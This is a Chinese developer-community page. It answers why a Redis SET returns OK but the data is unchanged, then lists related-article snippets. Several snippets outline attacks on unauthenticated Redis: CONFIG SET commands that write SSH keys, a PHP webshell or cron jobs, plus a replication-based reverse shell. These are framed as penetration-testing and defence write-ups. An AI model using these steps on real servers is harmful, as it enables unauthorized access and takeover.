开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

Redis set命令成功，但数据库未更改

Redis是一个开源的内存数据结构存储系统，常用于缓存、消息队列、实时数据分析等场景。它支持多种数据结构，如字符串、哈希表、列表、集合和有序集合等。

在Redis中，set命令用于设置指定键的值。当set命令成功执行时，会返回"OK"，表示设置成功。但是，如果数据库未更改，可能有以下几种可能性：

数据库连接问题：可能是由于网络故障或数据库服务器故障导致无法与数据库建立连接。可以检查网络连接是否正常，以及数据库服务器是否正常运行。
数据库配置问题：可能是由于数据库配置错误导致数据未更改。可以检查数据库配置文件，确保数据库连接参数正确配置。
数据库操作问题：可能是由于操作错误导致数据未更改。可以检查set命令的参数是否正确，确保指定的键和值是正确的。

针对以上问题，可以通过以下方式进行排查和解决：

检查网络连接：可以使用ping命令测试与数据库服务器的网络连接是否正常。如果网络连接存在问题，可以联系网络管理员进行修复。
检查数据库服务器状态：可以使用telnet命令测试与数据库服务器的连接是否正常。如果连接失败，可以检查数据库服务器是否正常运行，并确保数据库服务已启动。
检查数据库配置：可以检查数据库配置文件，确保数据库连接参数正确配置。可以参考腾讯云Redis产品文档（https://cloud.tencent.com/document/product/239/310）了解如何正确配置Redis。
检查set命令参数：可以检查set命令的参数是否正确，确保指定的键和值是正确的。可以参考腾讯云Redis产品文档中的set命令介绍（https://cloud.tencent.com/document/product/239/306）了解set命令的正确使用方法。

总结起来，当Redis的set命令成功执行但数据库未更改时，可能是由于网络连接问题、数据库配置问题或操作错误导致的。可以通过检查网络连接、数据库服务器状态、数据库配置和set命令参数等方面进行排查和解决。

相关搜索:$this-db-update工作但数据库未更改 axios修补程序请求‘成功’，但数据未更改 jdbc.update在数据库中成功，但密钥持有者未返回内容 JMETER_HOME环境变量未正确定义，但构建成功，并且脚本在Jmeter和命令提示符中工作正常 mongoose.findoneandupdate()表示更新成功，但数据库中未发生任何更改 NodeJS未返回状态码，但更改了数据库 PHP文件报告成功，但MySQL数据库未更新 SetComputerNameEX返回成功，但计算机名称在重新启动后未更改图像文件上传到文件夹成功，但文件名未保存在数据库中 js 手机通讯录

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Windows 系统中 CMD 工具常用命令

版本查看命令安装的工具添加了 Path 环境变量后，可以直接在 CMD 命令行中使用工具自带的命令。而命令的成功执行，标志着工具安装成功。...命令解释类型 select index 连接到第 index-1 个数据库（Redis 默认是有16个数据库的，编号是 0~15，通过 select 命令来切换数据库） 数据库切换 dbsize 查询这个数据库的...操作端``键入 info，获取 Redis 所有信息``，版本信息就在前面命令大小写都可以数据类型：字符串 String、哈希 hash、列表 list、集合 set、有序集合 sorted set...虽然说，常用的编码工具都内置了 GIT GUL操作界面，但熟悉常用命令才能更好的使用 Git。...add 文件名提交这个文件到暂存区（提交所有文件时，可以用'.'） git commit -m 提交信息正式提交暂存区的文件，提交信息为提交信息（需要用'""'号） git status 查看已更改未暂存

8962 0

Redis未授权访问漏洞利用总结

Redis因配置不当可以未授权访问（窃取数据、反弹shell、数据备份操作主从复制、命令执行）。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行flushall来清空所有数据。...不需校验直接就可以连接redis,存在Redis未授权访问漏洞。备注：测试的时候如果出现redis客户端一直连不上的情况，在靶机上执行了以下命令，客户端就可以连接上了。...漏洞利用利用姿势1,redis写入ssh公钥，获取操作系统权限原理：利用了redis数据库的备份功能，当redis以root身份运行，利用Redis的config set命令，只要内容为SSH公钥内容...攻击机连接靶机Redis redis-cli -h 10.1.8.158 使用 CONFIG GET dir 命令得到redis备份的路径，更改redis备份路径为ssh公钥存放目录（一般默认为/...利用姿势2,直接向Web目录中写webshell 原理：利用了redis数据库的备份功能，在知道了网站路径以后，使用redis的CONFIG set命令，将文件内容为一句话木马，文件路径为网站根目录的

8.4K3 1

Redis 常见漏洞利用方法总结

2.编辑配置可以通过修改 redis.conf 文件或使用 CONFIG set命令来修改配置基本命令语法 redis 127.0.0.1:6379> CONFIG SET CONFIG_SETTING_NAME...2.SET 命令 Redis SET 命令用于设置给定 key 的值。如果 key 已经存储其他值， SET 就覆写旧值，且无视类型。...然后可以使用蚁剑成功连接。 ? 2.利用 Redis 写入SSH公钥 1.利用条件服务端的Redis连接存在未授权，在攻击机上能用redis-cli直接登陆连接，并未登陆验证。...但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。...但此工具最大的缺点就是只能使用于目标存在redis未授权访问漏洞时使用，当目标存在密码时无法使用。所以看下其他的工具。

2.6K2 1

渗透测试怎么利用Redis提权

1 save 300 10 save 60 10000 分别表示 900 秒（15 分钟）内有 1 个更改，300 秒（5 分钟）内有 10 个更改以及 60 秒内有 10000 个更改。...FLUSHALL 删除所有数据库的所有key FLUSHDB 删除当前数据库的所有key LASTSAVE 返回最近一次 Redis 成功将数据保存到磁盘上的时间，以 UNIX 时间戳格式表示(结合显示当前时间的函数...使用Redis提权首先我们要做的第一步是登录到Redis里面去, 可进入方式有: redis未授权访问漏洞原因可看上面的参数配置requirepass,默认情况下是可无密码登录的弱口令进入到redis...-h redis_ip -x set crack 将生成的ssh公钥写入redis(如果成功会返回一个OK) 登录靶机的redis服务redis-cli -h redis_ip config...但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。

1.2K2 0

利用redis写webshell

都是所谓的“非关系型数据库”，有什么区别么？实际上，在我看来，redis的角色更接近于memcache，而mongodb是一个真正的数据库。...redis安装完成以后有自己的命令行，也就是redis-cli，其中包含的命令可以在：http://redis.io/commands 进行查阅。各个客户端基本也就是依照这个命令去增删改查。...我们可以设置让redis再指定时间、指定更改次数时进行备份，生成RDB文件；而设置AOF，可以在操作或时间过程后将“日志”写入一个文件的最末，当操作越来越多，则AOF文件越来越大。...当我们获得了一个redis控制台，我们可以调用config set/get等命令对redis的部分配置进行修改。而恰好的是，我们可以通过config set来更改dir和dbfilename。...可惜的是，appendfilename的值并不能使用config set命令定义： ? 但仅有的一个dbfilename已经足够了。所以，以后如果扫到redis未授权访问，先别急着提交乌云。

1.1K4 0

redis 乐观锁_用了乐观锁还需要事物吗

应用场景：比如统计用户信息，活跃或不活跃，打开，或者未打卡，登录，或者未登录。只要设计两个状态的都可以使用Bitmaps。...事务 Redis只是单条命令保证原子性，但是事务并不保证原子性 Redis的事务就是一组命令的集合 redis 是单线程的，也就意味着它总是以串行方式执行，同一时刻内不会有其他事务打断当前事务的执行...命令开启事务：multi 命令入队：众多Redis命令执行事务：exec 127.0.0.1:6379> multi //开启事务 OK 127.0.0.1:6379> set k1 v1...k1 (nil) 事务不保证原子性实例编译型异常(代码有问题，命令有错)，事务中所有的命令都不会被执行 127.0.0.1:6379> MULTI OK 127.0.0.1:6379> set...成功":"失败")); Redis使用监控机制来实现乐观锁 127.0.0.1:6379> set mymoney 100 OK 127.0.0.1:6379> set yourmoney 0 OK

2492 0

redis 乐观锁_数据库乐观锁实现

应用场景：比如统计用户信息，活跃或不活跃，打开，或者未打卡，登录，或者未登录。只要设计两个状态的都可以使用Bitmaps。...事务 Redis只是单条命令保证原子性，但是事务并不保证原子性 Redis的事务就是一组命令的集合 redis 是单线程的，也就意味着它总是以串行方式执行，同一时刻内不会有其他事务打断当前事务的执行...命令开启事务：multi 命令入队：众多Redis命令执行事务：exec 127.0.0.1:6379> multi //开启事务 OK 127.0.0.1:6379> set k1 v1...k1 (nil) 事务不保证原子性实例编译型异常(代码有问题，命令有错)，事务中所有的命令都不会被执行 127.0.0.1:6379> MULTI OK 127.0.0.1:6379> set...成功":"失败")); Redis使用监控机制来实现乐观锁 127.0.0.1:6379> set mymoney 100 OK 127.0.0.1:6379> set yourmoney 0 OK

5575 0

redis 乐观锁_什么时候用乐观锁

应用场景：比如统计用户信息，活跃或不活跃，打开，或者未打卡，登录，或者未登录。只要设计两个状态的都可以使用Bitmaps。...事务 Redis只是单条命令保证原子性，但是事务并不保证原子性 Redis的事务就是一组命令的集合 redis 是单线程的，也就意味着它总是以串行方式执行，同一时刻内不会有其他事务打断当前事务的执行...命令开启事务：multi 命令入队：众多Redis命令执行事务：exec 127.0.0.1:6379> multi //开启事务 OK 127.0.0.1:6379> set k1 v1...k1 (nil) 事务不保证原子性实例编译型异常(代码有问题，命令有错)，事务中所有的命令都不会被执行 127.0.0.1:6379> MULTI OK 127.0.0.1:6379> set...成功":"失败")); Redis使用监控机制来实现乐观锁 127.0.0.1:6379> set mymoney 100 OK 127.0.0.1:6379> set yourmoney 0 OK

3254 0

redis 乐观锁_redis 乐观锁

应用场景：比如统计用户信息，活跃或不活跃，打开，或者未打卡，登录，或者未登录。只要设计两个状态的都可以使用Bitmaps。...事务 Redis只是单条命令保证原子性，但是事务并不保证原子性 Redis的事务就是一组命令的集合 redis 是单线程的，也就意味着它总是以串行方式执行，同一时刻内不会有其他事务打断当前事务的执行...命令开启事务：multi 命令入队：众多Redis命令执行事务：exec 127.0.0.1:6379> multi //开启事务 OK 127.0.0.1:6379> set k1 v1...k1 (nil) 事务不保证原子性实例编译型异常(代码有问题，命令有错)，事务中所有的命令都不会被执行 127.0.0.1:6379> MULTI OK 127.0.0.1:6379> set...成功":"失败")); Redis使用监控机制来实现乐观锁 127.0.0.1:6379> set mymoney 100 OK 127.0.0.1:6379> set yourmoney 0 OK

3942 0

未授权访问漏洞——以redis为例

未授权漏洞的定义什么是未授权漏洞？需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。...但用户却在没有登录的情况下（当然也没有利用cookies等授权的操作），也成功发表评论。...关系型数据库基本上都有未授权访问漏洞非关系型数据库基本上只有redis有未授权漏洞漏洞类型默认密码空密码垂直越权、水平越权前端取消跳转直接访问绕过如何发现扫特定服务端口扫多级子域名...这时候会导致未授权访问然后使用redis权限写文件。虽然可以直接利用这个漏洞访问redis数据库，但是，万一管理员哪天把漏洞堵上了呢？...2.执行命令 redis-cli -h 172.16.11.78 config set dir /var/spool/cron/ config set dbfilename root set x "\n

9935 2

Redis未授权访问漏洞总结

Redis未授权访问漏洞，包括很多姿势，之前一直有接触，但并没有认真总结过，最近有点闲。并且在准备HW的东西而未授权的Redis 在内网中很容易遇到，故写篇文章记录之。...Redis简介 Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，...Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行操作。...yum安装gcc依赖 yum install gcc 编译 cd redis-4.0.6/src make 编译成功将redis的命令安装到/usr/bin/目录 sudo make install...重启服务器 redis-server redis.conf SSH密钥登陆本机Mac作为攻击机，链接一下虚拟机的 Redis数据库 直接可以连接，说明存在未授权访问漏洞 Linux服务器我们一般采用密码方式登陆

1.4K2 0

【应急响应】redis未授权访问致远程植入挖矿脚本（攻击篇）

0 继续篇章在上一篇【应急响应】redis未授权访问致远程植入挖矿脚本（防御篇）中，从防御的角度详细描述了应急响应以及流程。...1 入侵痕迹 1.1 查看近期文件更改情况查看最近一个月更改的文件 find -type f -mtime -30 ?...2.2 redis未授权访问漏洞验证使用redis客户端尝试连接x.x.x.x成功，且发现ssh公钥 ? 执行服务器操作指令，获取redis以及服务器基本信息： info ?...3.4 redis客户端确认写入情况 sectest20170410写入成功 ?...端口设置配置bind选项，限定可以连接Redis服务器的IP，修改 Redis 的默认端口6379。强口令设置对redis设置强口令，禁止未授权访问。

2.8K6 0

Redis 攻击方法总结

命令 Redis SET 命令用于设置给定 key 的值。...redis SET 命令基本语法如下： redis 127.0.0.1:6379> SET KEY_NAME VALUE Get 命令 Redis Get 命令用于获取指定 key 的值。...如下图所示，写入成功：蚁剑连接，连接成功：利用 Redis 写入 SSH 公钥利用条件：服务端的Redis连接存在未授权，在攻击机上能用redis-cli直接登陆连接，并未登陆验证。...WebShell：蚁剑连接成功：写入SSH公钥同样，我们也可以直接这个存在Redis未授权的主机的~/.ssh目录下写入SSH公钥，直接实现免密登录，但前提是~/.ssh目录存在，如果不存在我们可以写入计划任务来创建该目录...但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。

1.1K1 0

Redis未授权访问漏洞的利用及防护

攻击者在未授权访问Redis的情况下，利用Redis自身的提供的config命令，可以进行文件的读写等操作。...二、安装ssh服务由于Ubuntu和Kali Linux已经安装有ssh服务，但默认没有启动，需使用systemctl start sshd命令启动ssh服务。...-x set crack OK ?...检查是否更改成功(查看有没有authorized_keys文件)，没有问题就保存然后退出，至此，我们成功地写入ssh公钥到靶机上 192.168.152.133:6379> config get dbfilename...很明显，我们已经登录成功了！至此，我们成功地利用redis未授权访问漏洞实现了ssh免密登录到目标服务器上。

1.7K4 0

Redis 常见漏洞利用方法总结

命令 Redis SET 命令用于设置给定 key 的值。...redis SET 命令基本语法如下： redis 127.0.0.1:6379> SET KEY_NAME VALUE Get 命令 Redis Get 命令用于获取指定 key 的值。...如下图所示，写入成功：蚁剑连接，连接成功：利用 Redis 写入 SSH 公钥利用条件：服务端的Redis连接存在未授权，在攻击机上能用redis-cli直接登陆连接，并未登陆验证。...利用 Redis 写入计划任务原理就是在数据库中插入一条数据，将计划任务的内容作为value，key值随意，然后通过修改数据库的默认路径为目标主机计划任务的路径，把缓冲的数据保存在文件里，这样就可以在服务器端成功写入一个计划任务进行反弹...WebShell：蚁剑连接成功：写入SSH公钥同样，我们也可以直接这个存在Redis未授权的主机的~/.ssh目录下写入SSH公钥，直接实现免密登录，但前提是~/.ssh目录存在，如果不存在我们可以写入计划任务来创建该目录

3.8K1 0

redis未授权访问利用汇总

这里正常连接上了，但是命令执行显示时间超时，应该是靶场问题利用redis写webshell 通过phpinfo 或者报错页面获得网站的绝对路径 config set：快捷修改redis...命令如下 config set dir /var/www/html/ config set dbfilename shell.php set x "\r\n\r\n<?...在受害机相应路径下传输公钥 ssh连接目标机成功 Redis 写入计划任务向数据库中插入一对键值(value,key),修改数据库的默认路径设置为目标主机计划任务的路径，把缓冲的数据保存在文件里，这样就可以在服务器端成功写入一个计划任务进行反弹...root save 这个方法只能Centos上使用，Ubuntu上行不通，原因如下：因为默认redis写文件后是644的权限，但ubuntu要求执行定时任务文件/var/spool/cron/crontabs...未授权利用手法总结 - FreeBuf网络安全行业门户 Redis未授权访问在windows下的利用-安全客 - 安全资讯平台 (anquanke.com) Redis未授权访问防御方法在redis安装目录下

831 0

渗透测试之地基服务篇：服务攻防之数据库Redis

Redis数据库安全！...二、利用主从复制RCE 未授权的redis会导致GetShell，可以说已经是众所周知的了。...然后执行脚本内写死的一些命令，利用这些命令我们就可以执行系统命令。问题来了，假如目标机器仅仅允许本地进行登录的时候，上述利用就直接暴毙。这个时候，我们可以通过配合其他漏洞，从目标本地登录redis。...反弹shell： system.rev 192.168.253.9 9999//执行反弹命令可看到成功反弹shell，可以进行交互 !!...1.绑定内网IP地址进行访问 2.requirepass 设置redis密码 3.保护模式开启 protected-mode 开启（默认开启） 4.最好把端口更改 5.单独为redis设置一个普通账号

7501 0

如何在Ubuntu 14.04上保护Redis安装

一般而言，Redis未针对最大安全性进行优化，而是为了获得最佳性能和简单性。不具有安全性的性能和简单性其实是一种灾难。即使Redis拥有的一些简单得安全功能，也没什么值得称赞的。...如果没有，本节中的说明将说明如何设置数据库服务器密码。配置Redis密码可启用其两个内置安全功能之一 - 该auth命令，要求客户端进行身份验证以访问数据库。...第二个命令使用Redis配置文件中指定的密码进行身份验证。 auth your_redis_password Redis确认。 OK 之后，重新运行上一个命令会成功。...set key1 10 OK get key1 查询Redis以获取新密钥的值。 get key1 "10" 最后一个命令退出redis-cli。...重命名的命令应该让其他人难以猜测，但很容易记住。不要让自己生活困难。

8621 1

小伙用 12 张图讲明白了 Redis 持久化！

02 AOF 持久化 AOF（Append Only File）持久化是通过保存 Redis 服务器所执行的写命令来记录数据库状态，也就是每当 Redis 执行一个改变数据集的命令时（比如 SET），...记录 AOF 时不会对命令进行语法检查，写后就只记录了执行成功的命令。（避免保存的错误的命令，恢复的时候就完犊子了）执行完之后再记录，不会阻塞当前的写操作写后有什么缺陷？...，上一秒内未落盘的命令操作仍然会丢失。...AOF 文件是不断地将写命令追加到文件的末尾来记录数据库状态的。写命令不断增加，AOF 体积也越来越大。有些命令是执行多次更新同一条数据，但其实它是可以合并成同一条命令的。...比如：LPUSH 对列表数据做了 6 次更改，但 AOF 只需要记录最后一次更改。因为日志恢复时，只需要执行最后一次更改的命令即可。为了处理这种情况，Redis 提供了 AOF 的重写机制。

5952 0

如何在Ubuntu 18.04上保护Redis的安装

一般而言，Redis未针对最大安全性进行优化，而是为了获得最佳性能和简单性。尽管如此，Redis确实内置了一些基本的安全功能。其中包括创建未加密密码的能力以及重命名和禁用命令的自由。...这些功能本身不能确保Redis安装的安全性。但是，配置它们仍然是使数据库脱离不安全状态的重要一步。...第四步 - 配置Redis密码配置Redis密码可启用其两个内置安全功能之一 -auth命令，该命令要求客户端进行身份验证以访问数据库。...下一个命令使用Redis配置文件中指定的密码进行身份验证： 127.0.0.1:6379> auth your_redis_password Redis认证： OK 之后，再次运行上一个命令将成功...这些不全，但重命名或禁用该列表中的所有命令是增强Redis服务器安全性的良好起点。是否应禁用或重命名命令取决于您的特定需求或站点的需求。如果您知道永远不会使用可能被滥用的命令，那么您可以禁用它。

1K5 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭